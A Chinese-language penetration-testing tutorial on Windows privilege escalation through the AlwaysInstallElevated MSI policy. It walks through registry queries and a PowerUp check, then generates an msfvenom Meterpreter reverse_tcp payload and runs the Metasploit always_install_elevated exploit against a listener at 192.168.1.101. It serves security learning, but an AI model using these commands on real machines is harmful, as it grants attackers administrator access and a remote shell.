总是以管理员权限安装的提权

参考资料: https://hacknpentest.com/windows-privilege-escalation-via-alwaysinstallelevated-technique/ 视频地址 作者注:跟linux中的suid权限有点像,某种应用程序,普通用户可以运行,并且程序有着管理员权限。

发现漏洞

1
2
reg query HKLM\Software\Policies\Microsoft\Windows\Installer
reg query HKCU\Software\Policies\Microsoft\Windows\Installer

AlwaysInstallElevated是一项功能,可为Windows计算机上的所有用户(特别是低特权用户)提供运行任何具有提升特权的MSI文件的功能。 MSI是基于Microsoft的安装程序软件包文件格式,用于安装,存储和删除程序。

注意:此选项等效于授予完整的管理权限,这可能会带来巨大的安全风险。 Microsoft强烈建议不要使用此设置。

默认情况下,此选项是关闭的,要创建此特权升级入口点,我们需要将其打开,我们将在此博客中进一步介绍。

由于该功能允许所有用户以提升的权限运行msi文件,因此低特权用户确实可以运行恶意的msi文件,并且可以生成shell或将新创建的用户添加到Administrator组。

使用powershell脚本发现漏洞

1
2
3
4
powershell -nop -ep bypass
Import-Module C:\Users\user\Desktop\PowerUp.ps1

Get-RegistryAlwaysInstallElevated

生成载荷

handler -H 192.168.1.101 -P 44555 -p windows/x64/meterpreter/reverse_tcp

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=44555 -f exe -o payload.exe

利用漏洞

use exploit/windows/local/always_install_elevated
show options
set session 1
set payload windows/x64/meterpreter/reverse_tcp
set lport 3344
set lhost 192.168.1.101
run